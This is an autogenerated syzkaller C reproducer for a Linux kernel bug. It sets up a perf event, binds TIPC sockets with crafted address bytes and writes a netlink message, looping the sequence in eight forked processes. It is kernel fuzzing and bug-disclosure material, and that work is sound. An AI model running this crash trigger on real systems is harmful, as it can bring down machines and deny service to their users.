// https://syzkaller.appspot.com/bug?id=bddba6ce33aa2286aed84ee50a7281d2d3f910f4
// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static void test();

void loop()
{
  while (1) {
    test();
  }
}

long r[45];
void test()
{
  memset(r, -1, sizeof(r));
  r[0] = syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x6ul, 0x32ul,
                 0xfffffffffffffffful, 0x0ul);
  *(uint32_t*)0x20e7af88 = (uint32_t)0x1;
  *(uint32_t*)0x20e7af8c = (uint32_t)0x78;
  *(uint8_t*)0x20e7af90 = (uint8_t)0x0;
  *(uint8_t*)0x20e7af91 = (uint8_t)0x0;
  *(uint8_t*)0x20e7af92 = (uint8_t)0x0;
  *(uint8_t*)0x20e7af93 = (uint8_t)0x0;
  *(uint32_t*)0x20e7af94 = (uint32_t)0x0;
  *(uint64_t*)0x20e7af98 = (uint64_t)0x6;
  *(uint64_t*)0x20e7afa0 = (uint64_t)0x0;
  *(uint64_t*)0x20e7afa8 = (uint64_t)0x0;
  *(uint8_t*)0x20e7afb0 = (uint8_t)0xd34;
  *(uint8_t*)0x20e7afb1 = (uint8_t)0x0;
  *(uint8_t*)0x20e7afb2 = (uint8_t)0x0;
  *(uint8_t*)0x20e7afb3 = (uint8_t)0x0;
  *(uint32_t*)0x20e7afb4 = (uint32_t)0x0;
  *(uint32_t*)0x20e7afb8 = (uint32_t)0x0;
  *(uint32_t*)0x20e7afbc = (uint32_t)0x0;
  *(uint64_t*)0x20e7afc0 = (uint64_t)0x0;
  *(uint64_t*)0x20e7afc8 = (uint64_t)0x0;
  *(uint64_t*)0x20e7afd0 = (uint64_t)0x0;
  *(uint64_t*)0x20e7afd8 = (uint64_t)0x0;
  *(uint64_t*)0x20e7afe0 = (uint64_t)0x0;
  *(uint32_t*)0x20e7afe8 = (uint32_t)0x7;
  *(uint64_t*)0x20e7aff0 = (uint64_t)0x7;
  *(uint32_t*)0x20e7aff8 = (uint32_t)0x0;
  *(uint16_t*)0x20e7affc = (uint16_t)0x0;
  *(uint16_t*)0x20e7affe = (uint16_t)0x0;
  r[28] = syscall(__NR_perf_event_open, 0x20e7af88ul, 0x0ul,
                  0xfffffffful, 0xfffffffffffffffful, 0x0ul);
  *(uint32_t*)0x200d1ffc = (uint32_t)0xffffffffffffff80;
  r[30] = syscall(__NR_setsockopt, 0xfffffffffffffffful, 0x10eul, 0x5ul,
                  0x200d1ffcul, 0x4ul);
  *(uint16_t*)0x20d80f80 = (uint16_t)0x1e;
  memcpy((void*)0x20d80f82,
         "\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x09\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
         "\xd6\x2e\x0a\x43\xa6\x32\xed\x49\x38\xd3\x6d\x73\xfb\x8f\x84"
         "\x01\xa3\xff\x59\x82\x9a\x2b\x0a\xfe\x7c\xe4\x3a\x4b\x24\x70"
         "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xf1\x60\xe7\xe5"
         "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\xf1\x31"
         "\x4a\x8e\xf1\x51\x62\x2c\xa5\xbd\xb9\xc8\xea\xd2\x00\x00\x77"
         "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x0e\xe5\x90\xc8\xb9\xf7"
         "\x0d\xc1\x36\xcb\x18\x4a",
         126);
  r[33] =
      syscall(__NR_bind, 0xfffffffffffffffful, 0x20d80f80ul, 0x80ul);
  r[34] = syscall(__NR_socket, 0x1eul, 0x2ul, 0x0ul);
  *(uint16_t*)0x20afb000 = (uint16_t)0x1e;
  memcpy((void*)0x20afb002,
         "\x01\x03\x00\x00\x00\x00\x00\xb9\x00\x00\x00\x00\x47\x00\x00"
         "\x00\x00\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
         "\xd6\x2e\x0a\x63\xa6\x32\xed\x49\x38\xd3\x6d\x73\xfb\x8f\x84"
         "\x01\xa3\xff\x59\x82\x9a\x2b\x0a\xfe\x7c\xe4\x3a\x4b\x24\x70"
         "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xf1\x60\xe7\xe5"
         "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\x51\xd2"
         "\x4a\xce\xf1\xf1\x62\x2c\xa5\xbd\xb9\xc8\xea\x31\x00\x00\x77"
         "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x04\x00\x00\x00\x00\xf7"
         "\x0d\xc1\x36\xcb\x18\x4a",
         126);
  r[37] = syscall(__NR_bind, r[34], 0x20afb000ul, 0x80ul);
  *(uint16_t*)0x201bb000 = (uint16_t)0x1e;
  memcpy((void*)0x201bb002,
         "\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x09\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
         "\xd6\x2e\x0a\x53\xa6\x32\xed\x49\x38\xd3\x6d\x0e\x00\x00\x00"
         "\x00\x00\x00\x00\x82\x9a\x2b\x0a\x00\x06\xe4\x3a\x4b\x24\x70"
         "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xe0\x60\xe7\xe5"
         "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\x51\x31"
         "\x4a\x8e\xf1\xf1\x62\x0c\x85\xbd\xb9\xc8\xea\xd2\x00\x00\x77"
         "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x0e\xe5\x90\xc8\xb9\xf7"
         "\x0d\xc1\x36\xcb\x18\x4a",
         126);
  r[40] = syscall(__NR_bind, r[34], 0x201bb000ul, 0x80ul);
  r[41] = syscall(__NR_close, r[34]);
  r[42] = syscall(__NR_socket, 0x10ul, 0x2ul, 0x10ul);
  memcpy((void*)0x20fdb000, "\x1c\x00\x00\x00\x1f\x00\x07\x20\x27\x01"
                            "\x00\x08\x1d\x00\x00\x00\x01\x00\x00\x00"
                            "\x00\x00\x00\x00\x06\x00\xf7\x00\x00\x02"
                            "\x00\x19\xfa\x97",
         34);
  r[44] = syscall(__NR_write, r[42], 0x20fdb000ul, 0x22ul);
}

int main()
{
  int i;
  for (i = 0; i < 8; i++) {
    if (fork() == 0) {
      loop();
      return 0;
    }
  }
  sleep(1000000);
  return 0;
}